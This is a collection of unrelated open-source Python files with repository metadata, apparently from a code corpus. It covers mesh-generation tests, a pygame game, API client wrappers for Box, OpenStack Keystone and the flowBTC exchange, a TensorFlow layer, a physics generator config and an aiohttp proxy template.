| false | false | 7,706 |
py
|
import numpy
import pytest
import meshzoo
from helpers import _near_equal
def test_cube():
points, cells = meshzoo.cube()
assert len(points) == 1331
assert len(cells) == 5000
points, cells = meshzoo.cube(nx=3, ny=3, nz=3)
assert len(points) == 27
assert all(numpy.sum(points, axis=0) == [13.5, 13.5, 13.5])
assert len(cells) == 40
def test_hexagon():
points, cells = meshzoo.hexagon(2)
assert len(points) == 61
assert _near_equal(numpy.sum(points, axis=0), [0.0, 0.0, 0.0])
assert len(cells) == 96
@pytest.mark.parametrize(
"num_twists, num_points, num_cells, ref1, ref2",
[
[1, 5890, 11400, [0, 0, 0], [2753575 / 9.0, 2724125 / 9.0, 58900 / 3.0]],
[2, 5890, 11400, [0, 0, 0], [2797750 / 9.0, 2679950 / 9.0, 58900 / 3.0]],
],
)
def test_moebius(num_twists, num_points, num_cells, ref1, ref2):
points, cells = meshzoo.moebius(num_twists, 190, 31, mode="smooth")
assert len(points) == num_points
assert len(cells) == num_cells
assert _near_equal(numpy.sum(points, axis=0), ref1, tol=1.0e-10)
sum_points2 = numpy.sum(points ** 2, axis=0)
assert numpy.allclose(sum_points2, ref2, rtol=1.0e-12, atol=0.0)
@pytest.mark.parametrize(
"num_twists, num_points, num_cells, ref1, ref2",
[
[
1,
5700,
11020,
[0, 0, 0],
[[296107.21982759, 292933.72844828, 19040.94827586]],
],
[
2,
5700,
11020,
[0, 0, 0],
[[300867.45689655, 288173.49137931, 19040.94827586]],
],
],
)
def test_moebius2(num_twists, num_points, num_cells, ref1, ref2):
points, cells = meshzoo.moebius(nl=190, nw=30, num_twists=num_twists, mode="smooth")
assert len(points) == num_points
assert len(cells) == num_cells
assert _near_equal(numpy.sum(points, axis=0), ref1, tol=1.0e-10)
sum_points2 = numpy.sum(points ** 2, axis=0)
assert numpy.allclose(sum_points2, ref2, rtol=1.0e-12, atol=0.0)
@pytest.mark.parametrize(
"num_twists, num_points, num_cells, ref1, ref2",
[
[1, 1000, 1800, [0, 0, 0], [1418750 / 27.0, 1418750 / 27.0, 137500 / 27.0]],
[2, 1000, 1800, [0, 0, 0], [484375 / 9.0, 1384375 / 27.0, 137500 / 27.0]],
],
)
def test_moebius3(num_twists, num_points, num_cells, ref1, ref2):
points, cells = meshzoo.moebius(num_twists, 100, 10, mode="classical")
assert len(points) == num_points
assert len(cells) == num_cells
assert _near_equal(numpy.sum(points, axis=0), ref1, tol=1.0e-10)
sum_points2 = numpy.sum(points ** 2, axis=0)
assert numpy.allclose(sum_points2, ref2, rtol=1.0e-12, atol=0.0)
def test_pseudomoebius():
points, cells = meshzoo.moebius(nl=190, nw=31, mode="pseudo")
assert len(points) == 5890
assert len(cells) == 11400
assert _near_equal(numpy.sum(points, axis=0), [0, 0, 0], tol=1.0e-10)
sum_points2 = numpy.sum(points ** 2, axis=0)
ref2 = [2753575 / 9.0, 2724125 / 9.0, 58900 / 3.0]
assert numpy.allclose(sum_points2, ref2, rtol=1.0e-12, atol=0.0)
def test_rectangle():
points, cells = meshzoo.rectangle(nx=11, ny=11, zigzag=False)
assert len(points) == 121
assert _near_equal(numpy.sum(points, axis=0), [60.5, 60.5, 0.0])
assert len(cells) == 200
points, cells = meshzoo.rectangle(nx=11, ny=11, zigzag=True)
assert len(points) == 121
assert _near_equal(numpy.sum(points, axis=0), [60.5, 60.5, 0.0])
assert len(cells) == 200
points, cells = meshzoo.rectangle(nx=2, ny=2, zigzag=True)
assert len(points) == 4
assert _near_equal(numpy.sum(points, axis=0), [2.0, 2.0, 0.0])
assert len(cells) == 2
points, cells = meshzoo.rectangle(nx=3, ny=2, zigzag=False)
assert len(points) == 6
assert _near_equal(numpy.sum(points, axis=0), [3.0, 3.0, 0.0])
assert len(cells) == 4
assert set(cells[0]) == set([0, 1, 4])
assert set(cells[2]) == set([0, 3, 4])
points, cells = meshzoo.rectangle(nx=3, ny=2, zigzag=True)
assert len(points) == 6
assert _near_equal(numpy.sum(points, axis=0), [3.0, 3.0, 0.0])
assert len(cells) == 4
assert set(cells[0]) == set([0, 1, 4])
assert set(cells[2]) == set([0, 3, 4])
def test_simple_arrow():
points, cells = meshzoo.simple_arrow()
assert len(points) == 5
assert _near_equal(numpy.sum(points, axis=0), [7.0, 0.0, 0.0])
assert len(cells) == 4
def test_simple_shell():
points, cells = meshzoo.simple_shell()
assert len(points) == 5
assert _near_equal(numpy.sum(points, axis=0), [0.0, 0.0, 1.0])
assert len(cells) == 4
def test_triangle():
points, cells = meshzoo.triangle(4)
assert len(points) == 15
assert _near_equal(numpy.sum(points, axis=0), [0.0, 0.0, 0.0])
assert len(cells) == 16
def test_tube():
points, cells = meshzoo.tube(n=10)
assert len(points) == 20
assert _near_equal(numpy.sum(points, axis=0), [0.0, 0.0, 0.0])
assert len(cells) == 20
def test_plot2d():
points, cells = meshzoo.triangle(4)
meshzoo.show2d(points, cells)
# def test_ball():
# points, cells = meshzoo.meshpy.ball.create_ball_mesh(10)
# assert len(points) == 1360
# assert len(cells) == 5005
#
#
# def test_cube():
# points, cells = meshzoo.meshpy.cube.create_mesh(10)
# assert len(points) == 50
# assert len(cells) == 68
#
#
# def test_ellipse():
# points, cells = meshzoo.meshpy.ellipse.create_mesh(0.5, 1, 100)
# assert len(points) == 1444
# assert len(cells) == 2774
#
#
# def test_lshape():
# points, cells = meshzoo.meshpy.lshape.create_mesh()
# assert len(points) == 38
# assert len(cells) == 58
#
#
# def test_lshape3d():
# points, cells = meshzoo.meshpy.lshape3d.create_mesh()
# assert len(points) == 943
# assert len(cells) == 3394
#
#
# def test_pacman():
# points, cells = meshzoo.meshpy.pacman.create_pacman_mesh()
# assert len(points) == 446
# assert len(cells) == 831
#
#
# def test_rectangle():
# points, cells = meshzoo.meshpy.rectangle.create_mesh()
# assert len(points) == 88
# assert len(cells) == 150
#
#
# def test_rectangle_with_hole():
# points, cells = meshzoo.meshpy.rectangle_with_hole.create_mesh()
# assert len(points) == 570
# assert len(cells) == 964
#
#
# def test_tetrahedron():
# points, cells = meshzoo.meshpy.tetrahedron.create_tetrahedron_mesh()
# assert len(points) == 604
# assert len(cells) == 1805
#
#
# def test_torus():
# points, cells = meshzoo.meshpy.torus.create_mesh()
# assert len(points) == 921
# assert len(cells) == 2681
# Disable for now since Gmsh doesn't pass for the version installed on travis
# (trusty).
# def test_screw():
# points, cells = meshzoo.pygmsh.screw.create_screw_mesh()
# assert len(points) == 2412
# assert len(cells) == 7934
# Disable for now since we need mshr in a dev version for mshr.Extrude2D
# def test_toy():
# points, cells = meshzoo.mshr.toy.create_toy_mesh()
# assert len(points) == 2760
# assert len(cells) == 11779
# if __name__ == '__main__':
# test_plot2d()
# # import meshio
# # points_, cells_ = meshzoo.triangle(7)
# # meshio.write('triangle.vtu', points_, {'triangle': cells_})
# # points_, cells_ = meshzoo.cube()
# # meshio.write('cube.vtu', points_, {'tetra': cells_})
def test_edges():
_, cells = meshzoo.triangle(2)
edges_nodes, edges_cells = meshzoo.create_edges(cells)
assert numpy.all(
edges_nodes
== [[0, 1], [0, 3], [1, 2], [1, 3], [1, 4], [2, 4], [3, 4], [3, 5], [4, 5]]
)
assert numpy.all(edges_cells == [[3, 1, 0], [5, 4, 2], [6, 3, 4], [8, 7, 6]])
|
[
"[email protected]"
] | |
586fbbda387bcc0fd0af65aec9272afaf55c6d94
|
db3a0578ef5d79cee7f9e96fa3fd291bbaaf9eb4
|
/Pygame/Bees/bees.py
|
90620d058d1920a15e8892180aa8c230a8c0d55f
|
[
"MIT"
] |
permissive
|
otisgbangba/python-lessons
|
0477a766cda6bc0e2671e4cce2f95bc62c8d3c43
|
a29f5383b56b21e6b0bc21aa9acaec40ed4df3cc
|
refs/heads/master
| 2022-11-03T22:10:52.845204 | 2020-06-13T15:42:40 | 2020-06-13T15:42:40 | 261,255,751 | 1 | 0 |
MIT
| 2020-05-04T17:48:12 | 2020-05-04T17:48:11 | null |
UTF-8
|
Python
| false | false | 1,885 |
py
|
import pygame, random
from pygame.locals import *
from util import loadImage
from bee import Bee
from flower import Flower
from score import Score
pygame.init()
TITLE = 'Bee, Get the Nectar!'
screen = pygame.display.set_mode((1280, 720), 0)
screenRect = screen.get_rect()
Bee.loadImages()
Flower.loadImages()
background = loadImage('clover-large.jpg')
font = pygame.font.Font(None, 48)
text = font.render(TITLE, 1, Color('white'))
textpos = text.get_rect(centerx=screenRect.width/2, centery=25)
background.blit(text, textpos)
screen.blit(background, (0, 0))
pygame.display.flip()
bee = Bee(screenRect)
flowers = pygame.sprite.Group()
score = Score()
drawingGroup = pygame.sprite.RenderUpdates()
drawingGroup.add(bee)
drawingGroup.add(score)
pygame.display.set_caption(TITLE)
pygame.mouse.set_visible(0)
clock = pygame.time.Clock()
angles = (( 45, 0, -45),
( 90, 0, -90),
(135, 180, -135))
# game loop
loop = True
while loop:
# get input
for event in pygame.event.get():
if event.type == QUIT \
or (event.type == KEYDOWN and event.key == K_ESCAPE):
loop = False
keystate = pygame.key.get_pressed()
xdir = keystate[K_RIGHT] - keystate[K_LEFT] # -1, 0, or 1
ydir = keystate[K_DOWN] - keystate[K_UP]
bee.setAngle(angles[ydir+1][xdir+1])
bee.rect = bee.rect.move((xdir * 8, ydir * 8)).clamp(screenRect)
# Detect collisions
for flower in pygame.sprite.spritecollide(bee, flowers, True):
score.score += 1
flower.kill()
if random.randint(0, 50) == 0:
flower = Flower(screenRect)
drawingGroup.add(flower)
flowers.add(flower)
drawingGroup.clear(screen, background)
drawingGroup.update()
changedRects = drawingGroup.draw(screen)
pygame.display.update(changedRects)
# maintain frame rate
clock.tick(40)
pygame.quit()
|
[
"[email protected]"
] | |
fc5c6cf54acdc92357aedf5a77af4161c7885cb0
|
44064ed79f173ddca96174913910c1610992b7cb
|
/Second_Processing_app/temboo/Library/Box/Users/DeleteUser.py
|
19db5a19eb485a39cf7171ed247400616e188e0a
|
[] |
no_license
|
dattasaurabh82/Final_thesis
|
440fb5e29ebc28dd64fe59ecd87f01494ed6d4e5
|
8edaea62f5987db026adfffb6b52b59b119f6375
|
refs/heads/master
| 2021-01-20T22:25:48.999100 | 2014-10-14T18:58:00 | 2014-10-14T18:58:00 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,041 |
py
|
# -*- coding: utf-8 -*-
###############################################################################
#
# DeleteUser
# Deletes a specified user.
#
# Python version 2.6
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
class DeleteUser(Choreography):
def __init__(self, temboo_session):
"""
Create a new instance of the DeleteUser Choreo. A TembooSession object, containing a valid
set of Temboo credentials, must be supplied.
"""
Choreography.__init__(self, temboo_session, '/Library/Box/Users/DeleteUser')
def new_input_set(self):
return DeleteUserInputSet()
def _make_result_set(self, result, path):
return DeleteUserResultSet(result, path)
def _make_execution(self, session, exec_id, path):
return DeleteUserChoreographyExecution(session, exec_id, path)
class DeleteUserInputSet(InputSet):
"""
An InputSet with methods appropriate for specifying the inputs to the DeleteUser
Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
"""
def set_AccessToken(self, value):
"""
Set the value of the AccessToken input for this Choreo. ((required, string) The access token retrieved during the OAuth2 process.)
"""
InputSet._set_input(self, 'AccessToken', value)
def set_Force(self, value):
"""
Set the value of the Force input for this Choreo. ((optional, boolean) Whether or not the user should be deleted even when they still own files.)
"""
InputSet._set_input(self, 'Force', value)
def set_Notify(self, value):
"""
Set the value of the Notify input for this Choreo. ((optional, boolean) Indicates that the user should receive an email notification of the transfer.)
"""
InputSet._set_input(self, 'Notify', value)
def set_UserID(self, value):
"""
Set the value of the UserID input for this Choreo. ((required, string) The id of the user whose information should be updated.)
"""
InputSet._set_input(self, 'UserID', value)
class DeleteUserResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the DeleteUser Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. ((json) The response from Box.)
"""
return self._output.get('Response', None)
class DeleteUserChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return DeleteUserResultSet(response, path)
|
[
"[email protected]"
] | |
b4fdf0086dda0bb0a9e8e631adbd62959995d35f
|
be01d0d54723d1e876c9a15618921dffe2b2255a
|
/Python/BinarySearch/two_sumII.py
|
0d534e7163571ad8332aad8f4b807b4999e276c6
|
[] |
no_license
|
jxlxt/leetcode
|
17e7f25bf94dd334ac0d6254ffcffa003ed04c10
|
a6e6e5be3dd5f9501d0aa4caa6744621ab887f51
|
refs/heads/master
| 2023-05-26T22:10:03.997428 | 2023-05-24T02:36:05 | 2023-05-24T02:36:05 | 118,216,055 | 0 | 0 | null | 2018-01-20T06:31:57 | 2018-01-20T06:30:06 | null |
UTF-8
|
Python
| false | false | 1,122 |
py
|
#! /Users/xiaotongli/anaconda3/bin/python
# -*- coding: utf-8 -*-
# @Time : 9/28/18 10:57 PM
# @Author : Xiaotong Li
# @School : University of California, Santa Cruz
# @FileName: autocomplete_System.py
# @Software: PyCharm
class Solution:
def twoSum(self, numbers, target):
"""
:type numbers: List[int]
:type target: int
:rtype: List[int]
"""
# the first method is dictinoary method
dict = {}
# enumerate() get the index and value of array
for i, num in enumerate(numbers):
if target - num in dict:
return [dict[target-num]+1, i+1]
dict[num] = i
# binary search method
for i in range(len(numbers)):
left, right = i+1, len(numbers) - 1
res = target - numbers[i]
while left <= right:
mid = left + (right - left) // 2
if numbers[mid] == res:
return [i+1, mid+1]
elif numbers[mid] < res:
left = mid + 1
else:
right = mid - 1
|
[
"[email protected]"
] | |
5bc08a32ba5bc9e78823dc89fe5070e1deb89e25
|
057d2d1e2a78fc89851154e87b0b229e1e1f003b
|
/venv/Lib/site-packages/keystoneclient/auth/identity/v2.py
|
add1da4f5d894be3192f1253735eca8da6d07f56
|
[
"Apache-2.0"
] |
permissive
|
prasoon-uta/IBM-Cloud-Secure-File-Storage
|
276dcbd143bd50b71121a73bc01c8e04fe3f76b0
|
82a6876316715efbd0b492d0d467dde0ab26a56b
|
refs/heads/master
| 2022-12-13T00:03:31.363281 | 2018-02-22T02:24:11 | 2018-02-22T02:24:11 | 122,420,622 | 0 | 2 |
Apache-2.0
| 2022-12-08T05:15:19 | 2018-02-22T02:26:48 |
Python
|
UTF-8
|
Python
| false | false | 7,824 |
py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import logging
from oslo_config import cfg
import six
from keystoneclient import access
from keystoneclient.auth.identity import base
from keystoneclient import exceptions
from keystoneclient import utils
_logger = logging.getLogger(__name__)
@six.add_metaclass(abc.ABCMeta)
class Auth(base.BaseIdentityPlugin):
"""Identity V2 Authentication Plugin.
:param string auth_url: Identity service endpoint for authorization.
:param string trust_id: Trust ID for trust scoping.
:param string tenant_id: Tenant ID for project scoping.
:param string tenant_name: Tenant name for project scoping.
:param bool reauthenticate: Allow fetching a new token if the current one
is going to expire. (optional) default True
"""
@classmethod
def get_options(cls):
options = super(Auth, cls).get_options()
options.extend([
cfg.StrOpt('tenant-id', help='Tenant ID'),
cfg.StrOpt('tenant-name', help='Tenant Name'),
cfg.StrOpt('trust-id', help='Trust ID'),
])
return options
def __init__(self, auth_url,
trust_id=None,
tenant_id=None,
tenant_name=None,
reauthenticate=True):
super(Auth, self).__init__(auth_url=auth_url,
reauthenticate=reauthenticate)
self._trust_id = trust_id
self.tenant_id = tenant_id
self.tenant_name = tenant_name
@property
def trust_id(self):
# Override to remove deprecation.
return self._trust_id
@trust_id.setter
def trust_id(self, value):
# Override to remove deprecation.
self._trust_id = value
def get_auth_ref(self, session, **kwargs):
headers = {'Accept': 'application/json'}
url = self.auth_url.rstrip('/') + '/tokens'
params = {'auth': self.get_auth_data(headers)}
if self.tenant_id:
params['auth']['tenantId'] = self.tenant_id
elif self.tenant_name:
params['auth']['tenantName'] = self.tenant_name
if self.trust_id:
params['auth']['trust_id'] = self.trust_id
_logger.debug('Making authentication request to %s', url)
resp = session.post(url, json=params, headers=headers,
authenticated=False, log=False)
try:
resp_data = resp.json()['access']
except (KeyError, ValueError):
raise exceptions.InvalidResponse(response=resp)
return access.AccessInfoV2(**resp_data)
@abc.abstractmethod
def get_auth_data(self, headers=None):
"""Return the authentication section of an auth plugin.
:param dict headers: The headers that will be sent with the auth
request if a plugin needs to add to them.
:return: A dict of authentication data for the auth type.
:rtype: dict
"""
pass # pragma: no cover
_NOT_PASSED = object()
class Password(Auth):
"""A plugin for authenticating with a username and password.
A username or user_id must be provided.
:param string auth_url: Identity service endpoint for authorization.
:param string username: Username for authentication.
:param string password: Password for authentication.
:param string user_id: User ID for authentication.
:param string trust_id: Trust ID for trust scoping.
:param string tenant_id: Tenant ID for tenant scoping.
:param string tenant_name: Tenant name for tenant scoping.
:param bool reauthenticate: Allow fetching a new token if the current one
is going to expire. (optional) default True
:raises TypeError: if a user_id or username is not provided.
"""
def __init__(self, auth_url, username=_NOT_PASSED, password=None,
user_id=_NOT_PASSED, **kwargs):
super(Password, self).__init__(auth_url, **kwargs)
if username is _NOT_PASSED and user_id is _NOT_PASSED:
msg = 'You need to specify either a username or user_id'
raise TypeError(msg)
if username is _NOT_PASSED:
username = None
if user_id is _NOT_PASSED:
user_id = None
self.user_id = user_id
self._username = username
self._password = password
@property
def username(self):
# Override to remove deprecation.
return self._username
@username.setter
def username(self, value):
# Override to remove deprecation.
self._username = value
@property
def password(self):
# Override to remove deprecation.
return self._password
@password.setter
def password(self, value):
# Override to remove deprecation.
self._password = value
def get_auth_data(self, headers=None):
auth = {'password': self.password}
if self.username:
auth['username'] = self.username
elif self.user_id:
auth['userId'] = self.user_id
return {'passwordCredentials': auth}
@classmethod
def load_from_argparse_arguments(cls, namespace, **kwargs):
if not (kwargs.get('password') or namespace.os_password):
kwargs['password'] = utils.prompt_user_password()
return super(Password, cls).load_from_argparse_arguments(namespace,
**kwargs)
@classmethod
def get_options(cls):
options = super(Password, cls).get_options()
options.extend([
cfg.StrOpt('username',
dest='username',
deprecated_name='user-name',
help='Username to login with'),
cfg.StrOpt('user-id', help='User ID to login with'),
cfg.StrOpt('password', secret=True, help='Password to use'),
])
return options
class Token(Auth):
"""A plugin for authenticating with an existing token.
:param string auth_url: Identity service endpoint for authorization.
:param string token: Existing token for authentication.
:param string tenant_id: Tenant ID for tenant scoping.
:param string tenant_name: Tenant name for tenant scoping.
:param string trust_id: Trust ID for trust scoping.
:param bool reauthenticate: Allow fetching a new token if the current one
is going to expire. (optional) default True
"""
def __init__(self, auth_url, token, **kwargs):
super(Token, self).__init__(auth_url, **kwargs)
self._token = token
@property
def token(self):
# Override to remove deprecation.
return self._token
@token.setter
def token(self, value):
# Override to remove deprecation.
self._token = value
def get_auth_data(self, headers=None):
if headers is not None:
headers['X-Auth-Token'] = self.token
return {'token': {'id': self.token}}
@classmethod
def get_options(cls):
options = super(Token, cls).get_options()
options.extend([
cfg.StrOpt('token', secret=True, help='Token'),
])
return options
|
[
"[email protected]"
] | |
319a8ecd8143da437cd5720b73ed24a1a396c1cc
|
2f09e893c3a21f4a17c95b99446d1efbf0b109f7
|
/huaytools/tensorflow/layers/__init__.py
|
6f45582415c893a8cb74a1d2dd931b0b6805be10
|
[
"MIT"
] |
permissive
|
knight134/huaytools
|
b19f0078e724963415c63d60218ae3cc624f598a
|
cbecd6771c05f8241e756a7619047589397b16d3
|
refs/heads/master
| 2020-04-24T18:30:27.732740 | 2018-05-27T13:51:24 | 2018-05-27T13:51:24 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,595 |
py
|
"""
"""
import tensorflow as tf
import tensorlayer as tl
# from .cnn import *
# from .rnn import *
from .attention import *
from .embedding import *
logging = tf.logging
def dense(inputs, n_units,
activation=tf.nn.relu,
use_bias=True,
W_init=tf.truncated_normal_initializer(stddev=0.1),
W_init_args=None,
b_init=tf.constant_initializer(value=0.0),
b_init_args=None,
name="dense",
reuse=None):
"""全连接层
input_shape: [batch_size, n_features]
output_shape: [batch_size, n_units]
References:
tf.layers.Dense
tl.layers.DenseLayer
"""
W_init_args = {} if W_init_args is None else W_init_args
b_init_args = {} if b_init_args is None else b_init_args
logging.info("DenseLayer: %s - n_units: %d activation: %s" % (name, n_units, activation.__name__))
# n_inputs = int(tf.convert_to_tensor(inputs).get_shape()[-1])
inputs = tf.convert_to_tensor(inputs)
n_inputs = inputs.get_shape()[-1].value
with tf.variable_scope(name, reuse=reuse):
W = tf.get_variable('W', shape=[n_inputs, n_units], initializer=W_init, dtype=tf.float32,
**W_init_args)
if use_bias:
b = tf.get_variable('b', shape=[n_units], initializer=b_init, dtype=tf.float32,
**b_init_args)
# outputs = act(tf.matmul(inputs, W) + b)
outputs = activation(tf.nn.xw_plus_b(inputs, W, b))
else:
outputs = activation(tf.matmul(inputs, W))
return outputs
|
[
"[email protected]"
] | |
df84bf9d01fc1b6084257e37167497a0c70e75dd
|
a5a99f646e371b45974a6fb6ccc06b0a674818f2
|
/Configuration/Generator/python/SingleElectronFlatPt5To100_pythia8_cfi.py
|
37df2ba0d8904688e35cfd867a38350252f6e5ef
|
[
"Apache-2.0"
] |
permissive
|
cms-sw/cmssw
|
4ecd2c1105d59c66d385551230542c6615b9ab58
|
19c178740257eb48367778593da55dcad08b7a4f
|
refs/heads/master
| 2023-08-23T21:57:42.491143 | 2023-08-22T20:22:40 | 2023-08-22T20:22:40 | 10,969,551 | 1,006 | 3,696 |
Apache-2.0
| 2023-09-14T19:14:28 | 2013-06-26T14:09:07 |
C++
|
UTF-8
|
Python
| false | false | 813 |
py
|
import FWCore.ParameterSet.Config as cms
generator = cms.EDFilter("Pythia8PtGun",
PGunParameters = cms.PSet(
MaxPt = cms.double(5.),
MinPt = cms.double(100.),
ParticleID = cms.vint32(11),
AddAntiParticle = cms.bool(True),
MaxEta = cms.double(2.5),
MaxPhi = cms.double(3.14159265359),
MinEta = cms.double(-2.5),
MinPhi = cms.double(-3.14159265359) ## in radians
),
Verbosity = cms.untracked.int32(0), ## set to 1 (or greater) for printouts
psethack = cms.string('single electron pt 5 to 100'),
firstRun = cms.untracked.uint32(1),
PythiaParameters = cms.PSet(parameterSets = cms.vstring())
)
|
[
"[email protected]"
] | |
7c258ecc296b93e65bf8e0cbc5b9c3df0c21f607
|
21818228cb62d31b9685de44deb27cfd90430573
|
/ccxt/flowbtc.py
|
2153a8b8e285212a60a2754aaf3d616c1ebb77d1
|
[] |
no_license
|
mico/cryptoArbitrage
|
d9d5d2f89e3fccc0b84d9c13b771edef0f2b00a1
|
ea9ef03e79f302b36948746c77e4acbb3d6f01b7
|
refs/heads/master
| 2021-03-22T00:17:30.448593 | 2018-05-28T05:08:21 | 2018-05-28T05:08:21 | 108,232,310 | 2 | 4 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,310 |
py
|
# -*- coding: utf-8 -*-
from ccxt.base.exchange import Exchange
from ccxt.base.errors import ExchangeError
class flowbtc (Exchange):
def describe(self):
return self.deep_extend(super(flowbtc, self).describe(), {
'id': 'flowbtc',
'name': 'flowBTC',
'countries': 'BR', # Brazil
'version': 'v1',
'rateLimit': 1000,
'hasCORS': True,
'urls': {
'logo': 'https://user-images.githubusercontent.com/1294454/28162465-cd815d4c-67cf-11e7-8e57-438bea0523a2.jpg',
'api': 'https://api.flowbtc.com:8400/ajax',
'www': 'https://trader.flowbtc.com',
'doc': 'http://www.flowbtc.com.br/api/',
},
'requiredCredentials': {
'apiKey': True,
'secret': True,
'uid': True,
},
'api': {
'public': {
'post': [
'GetTicker',
'GetTrades',
'GetTradesByDate',
'GetOrderBook',
'GetProductPairs',
'GetProducts',
],
},
'private': {
'post': [
'CreateAccount',
'GetUserInfo',
'SetUserInfo',
'GetAccountInfo',
'GetAccountTrades',
'GetDepositAddresses',
'Withdraw',
'CreateOrder',
'ModifyOrder',
'CancelOrder',
'CancelAllOrders',
'GetAccountOpenOrders',
'GetOrderFee',
],
},
},
})
def fetch_markets(self):
response = self.publicPostGetProductPairs()
markets = response['productPairs']
result = []
for p in range(0, len(markets)):
market = markets[p]
id = market['name']
base = market['product1Label']
quote = market['product2Label']
symbol = base + '/' + quote
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'info': market,
})
return result
def fetch_balance(self, params={}):
self.load_markets()
response = self.privatePostGetAccountInfo()
balances = response['currencies']
result = {'info': response}
for b in range(0, len(balances)):
balance = balances[b]
currency = balance['name']
account = {
'free': balance['balance'],
'used': balance['hold'],
'total': 0.0,
}
account['total'] = self.sum(account['free'], account['used'])
result[currency] = account
return self.parse_balance(result)
def fetch_order_book(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
orderbook = self.publicPostGetOrderBook(self.extend({
'productPair': market['id'],
}, params))
return self.parse_order_book(orderbook, None, 'bids', 'asks', 'px', 'qty')
def fetch_ticker(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
ticker = self.publicPostGetTicker(self.extend({
'productPair': market['id'],
}, params))
timestamp = self.milliseconds()
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': float(ticker['high']),
'low': float(ticker['low']),
'bid': float(ticker['bid']),
'ask': float(ticker['ask']),
'vwap': None,
'open': None,
'close': None,
'first': None,
'last': float(ticker['last']),
'change': None,
'percentage': None,
'average': None,
'baseVolume': float(ticker['volume24hr']),
'quoteVolume': float(ticker['volume24hrProduct2']),
'info': ticker,
}
def parse_trade(self, trade, market):
timestamp = trade['unixtime'] * 1000
side = 'buy' if (trade['incomingOrderSide'] == 0) else 'sell'
return {
'info': trade,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': market['symbol'],
'id': str(trade['tid']),
'order': None,
'type': None,
'side': side,
'price': trade['px'],
'amount': trade['qty'],
}
def fetch_trades(self, symbol, since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
response = self.publicPostGetTrades(self.extend({
'ins': market['id'],
'startIndex': -1,
}, params))
return self.parse_trades(response['trades'], market)
def create_order(self, symbol, type, side, amount, price=None, params={}):
self.load_markets()
orderType = 1 if (type == 'market') else 0
order = {
'ins': self.market_id(symbol),
'side': side,
'orderType': orderType,
'qty': amount,
'px': price,
}
response = self.privatePostCreateOrder(self.extend(order, params))
return {
'info': response,
'id': response['serverOrderId'],
}
def cancel_order(self, id, symbol=None, params={}):
self.load_markets()
if 'ins' in params:
return self.privatePostCancelOrder(self.extend({
'serverOrderId': id,
}, params))
raise ExchangeError(self.id + ' requires `ins` symbol parameter for cancelling an order')
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = self.urls['api'] + '/' + self.version + '/' + path
if api == 'public':
if params:
body = self.json(params)
else:
self.check_required_credentials()
nonce = self.nonce()
auth = str(nonce) + self.uid + self.apiKey
signature = self.hmac(self.encode(auth), self.encode(self.secret))
body = self.json(self.extend({
'apiKey': self.apiKey,
'apiNonce': nonce,
'apiSig': signature.upper(),
}, params))
headers = {
'Content-Type': 'application/json',
}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def request(self, path, api='public', method='GET', params={}, headers=None, body=None):
response = self.fetch2(path, api, method, params, headers, body)
if 'isAccepted' in response:
if response['isAccepted']:
return response
raise ExchangeError(self.id + ' ' + self.json(response))
|
[
"[email protected]"
] | |
dcd8e325ace6b51794580b2b65cb39022b4d9256
|
837ebd601d0882e370522719606c975b9c815ad2
|
/adm/templates/plugins/mediation/{{cookiecutter.name}}/main/application.py
|
9ee876166f3b2151ae78f6033bb9438e0b514679
|
[
"BSD-3-Clause"
] |
permissive
|
dearith/mfserv
|
8ba97e211d31a177fc6de160cd4b1f8555ebf600
|
ad72e51bf77595a75dcb2600d7323f13e2c2fb4b
|
refs/heads/master
| 2021-08-15T21:17:30.528351 | 2019-04-25T10:25:58 | 2019-04-25T10:25:58 | 183,577,154 | 0 | 0 | null | 2019-04-26T07:10:44 | 2019-04-26T07:10:43 | null |
UTF-8
|
Python
| false | false | 2,141 |
py
|
from aiohttp import web, ClientSession
from aiohttp_metwork_middlewares import mflog_middleware
CHUNK_SIZE = 4096 * 1024
STREAMING_MODE = True
async def handle(request):
# Log something with context aware logger
log = request['mflog_logger']
http_method = request.method
url_path_qs = request.path_qs
log.info("got a %s call on %s" % (http_method, url_path_qs))
# For this example, we limit the service to GET/HEAD methods
if http_method not in ["GET", "HEAD"]:
return web.Response(status=405)
# Let's build the backend url
backend_url = "http://mybackend%s" % url_path_qs
async with ClientSession() as session:
log.info("calling %s on %s..." % (http_method, backend_url))
async with session.get(backend_url) as resp:
backend_status = resp.status
log.info("got an HTTP/%i status" % backend_status)
if not STREAMING_MODE:
######################
# NON STREAMING MODE #
######################
body = await resp.read()
response = web.Response(
headers={"Content-Type": resp.headers['Content-Type']},
body=body
)
else:
##################
# STREAMING MODE #
##################
# Let's prepare a streaming response
response = web.StreamResponse(
headers={"Content-Type": resp.headers['Content-Type']}
)
await response.prepare(request)
response.content_type = resp.headers['Content-Type']
# Let's stream the response body to avoid storing it in memory
while True:
chunk = await resp.content.read(CHUNK_SIZE)
if not chunk:
break
await response.write(chunk)
await response.write_eof()
return response
app = web.Application(middlewares=[mflog_middleware])
app.router.add_route('*', '/{tail:.*}', handle)
|
[
"[email protected]"
] | |
c117af46846c1174ea7008f8552fa52b1505a9b8
|
